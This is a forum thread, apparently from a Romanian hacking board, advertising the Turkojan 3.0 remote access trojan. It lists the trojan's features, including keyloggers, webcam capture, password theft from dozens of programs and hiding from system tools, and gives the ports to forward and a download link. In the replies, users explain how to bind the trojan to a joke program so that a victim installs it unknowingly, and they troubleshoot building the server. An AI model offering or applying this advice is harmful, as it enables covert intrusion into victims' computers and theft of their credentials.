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Turkojan 3.0

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Turkojan 3.0 Properties


+Reverse Connection

+Remote passwords

+Chat with server

+Send fake messages

+Advanced file manager

+Zipping files&folders

+Find files

+Change remote screen resolution

+Print text to remote screen

+Mouse manager

+Information about remote computer

+Clipboard managet

+Set remote date/time

+IE options

+Running Process

+Service Manager

+Keyboard Manager

+Sending Keys

+Online keylogger

+Offline keylogger

+Fun Menu

+Print Text

+Change Windows Colors

+Registry manager

+Take screenshot

+Take photo from webcam

+Invisible in Netstat/Searching Files/Regedit/Msconfig


Remote passwords


Turkojan can get remote passwords via advanced password manager.

Turkojan can get this programs' passwords :


+ICQ 99/2003/Lite

+MSN Messenger 6.x / 7.x Passwords

+Windows Messenger Passwords

+Yahoo Messenger 5.x / 6.x Passwords

+Miranda-IM Passwords

+Trillian Passwords

+&RQ Passwords

+The Bat! Passwords

+AOL IM Â?Passwords

+Windows & Total Commander Passwords

+GAIM Passwords

+Becky Passwords

+Cute FTP Passwords

+E-Dialer Passwords

+FAR Manager Passwords

+WS_FTP Passwords

+Other Ftp Passwords

+IE Passwords

+Mozilla Passwords

+Firefox Passwords

+Opera Passwords

+Outlook Passwords

+Opera Mail Passwords

+RAS (Dial-up) Passwords

+Cached Passwords

Also Turkojan can get these passwords via its special plugin :


+Outlook Express Passwords

+Microsoft Outlook 2000 Passwords

+Microsoft Outlook 2002/2003 Passwords

+IncrediMail Passwords

+Eudora Passwords

+Netscape 6.x/7.x Passwords

+Mozilla Thunderbird Passwords

+Group Mail Free Passwords

+Yahoo! Mail Passwords

+Hotmail/MSN Mail Passwords

+Gmail Passwords

+IE/FTP Passwords

You must forward these ports : 15963,5742,5743,5744,5745

Download : http://www.turkojan.com/download.php?file=...urkojaneng3.zip

Have Fun ! ;)


<div class='quotetop'>QUOTE("DANG3R")</div>

i'm such a noob :@ nush cei aia bindeaza :(

"a binda" inseamna "a uni". unesti 2 sau mai multe fisiere intr-un singur exe

spre exemplu ai server-ul facut cu un trojan builder. bindezi serverul cu un programel-gluma si il trimit victimei. ala da click pe fisierul rezultat, vede gluma (sa zicem programu ala care iti "invarte" ecranul) si in timpul asta trojanu se instaleaza


<div class='quotetop'>QUOTE("DANG3R")</div>

lam bagat si tot nu se conect :( ms oricum o sa ma mai chinui mai pe seara :D

inseamna ca nu a dat "Dublu-click" victima pe server .


deci am postat shi la sectiunea cereri dar nimeni nu ma ajutat..mai intreb shi eu odata :) cum fac serverul ? am facut fake message, am pus iconita, am dat bind file cu o poza...dau save..la server dar nimik..acolo imi zice k il salveaza..shi de fapt nu imi apare nimik :| il salvez .bat sau .scr..

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